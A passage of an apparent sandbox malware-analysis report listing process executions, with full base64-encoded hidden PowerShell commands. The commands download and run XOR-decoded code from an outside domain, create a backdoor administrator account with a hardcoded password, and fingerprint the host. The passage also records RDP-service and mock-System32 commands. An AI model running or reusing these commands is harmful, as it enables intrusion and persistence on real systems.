QAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                      Imagebase:0x7ff605a10000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:04:45:55
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:04:45:55
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                      Imagebase:0x7ff7b1750000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:04:45:55
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:04:45:55
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\About-Us.docx.docx" /o ""
                                                                                      Imagebase:0x7ff6e5220000
                                                                                      File size:1'635'104 bytes
                                                                                      MD5 hash:E7F3B8EA1B06F46176FC5C35307727D6
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:04:45:58
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\sppsvc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\sppsvc.exe
                                                                                      Imagebase:0x7ff7653d0000
                                                                                      File size:4'629'328 bytes
                                                                                      MD5 hash:30C7EF47B57367CC546173BB4BB2BB04
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:18
                                                                                      Start time:04:46:02
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                      Imagebase:0x7ff733860000
                                                                                      File size:496'640 bytes
                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:19
                                                                                      Start time:04:46:30
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\Temp\svczHost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
                                                                                      Imagebase:0x7ff7809c0000
                                                                                      File size:8'351'232 bytes
                                                                                      MD5 hash:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 16%, ReversingLabs
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:20
                                                                                      Start time:04:46:30
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:21
                                                                                      Start time:04:46:30
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
                                                                                      Imagebase:0x7ff605a10000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:22
                                                                                      Start time:04:46:31
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"cmd.exe" /c sc query myRdpService
                                                                                      Imagebase:0x7ff605a10000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:23
                                                                                      Start time:04:46:31
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
                                                                                      Imagebase:0x7ff7b1750000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:24
                                                                                      Start time:04:46:31
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:25
                                                                                      Start time:04:46:32
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:26
                                                                                      Start time:04:46:32
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:sc query myRdpService
                                                                                      Imagebase:0x7ff79b890000
                                                                                      File size:72'192 bytes
                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:27
                                                                                      Start time:04:46:32
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
                                                                                      Imagebase:0x7ff7b1750000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:28
                                                                                      Start time:04:46:32
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:29
                                                                                      Start time:04:47:16
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"cmd.exe" /c sc query myRdpService
                                                                                      Imagebase:0x7ff605a10000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:30
                                                                                      Start time:04:47:16
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:31
                                                                                      Start time:04:47:16
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:sc query myRdpService
                                                                                      Imagebase:0x7ff79b890000
                                                                                      File size:72'192 bytes
                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:32
                                                                                      Start time:04:47:16
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"cmd.exe" /c sc stop "myRdpService"
                                                                                      Imagebase:0x7ff605a10000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:33
                                                                                      Start time:04:47:16
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:34
                                                                                      Start time:04:47:16
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:sc stop "myRdpService"
                                                                                      Imagebase:0x7ff79b890000
                                                                                      File size:72'192 bytes
                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:35
                                                                                      Start time:04:47:17
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"cmd.exe" /c sc query myRdpService
                                                                                      Imagebase:0x7ff605a10000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
